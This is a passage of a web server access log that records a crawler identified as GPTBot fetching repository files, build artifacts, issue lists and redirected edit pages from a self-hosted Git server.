+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 9858] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:17:44:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:17:44:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:17:44:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:17:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html?display=source" [Client 74.7.227.38] [Length 227540] [Gzip 18.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:17:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:17:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2058] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:17:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 323599] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:17:44:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 347696] [Gzip 27.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:17:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10129] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:17:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" -[17/Feb/2026:17:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp?display=source" [Client 74.7.227.38] [Length 14231] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp" -[17/Feb/2026:17:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11186] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" -[17/Feb/2026:17:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp" -[17/Feb/2026:17:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp?display=source" [Client 74.7.227.38] [Length 17572] [Gzip 6.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" -[17/Feb/2026:17:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11187] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp" -[17/Feb/2026:17:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp" -[17/Feb/2026:17:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" -[17/Feb/2026:17:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9962] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" -[17/Feb/2026:17:45:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:17:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:17:45:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:17:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:17:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&state=open&type=all" -[17/Feb/2026:17:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:17:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10314] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10321] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11596] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11601] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11602] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10316] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:45:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2f__pycache__%2finvesting_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 20834] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" -[17/Feb/2026:17:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc" -[17/Feb/2026:17:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/calculator.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/calculator.cpython-312.pyc" -[17/Feb/2026:17:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33676] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33679] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33679] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43111] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 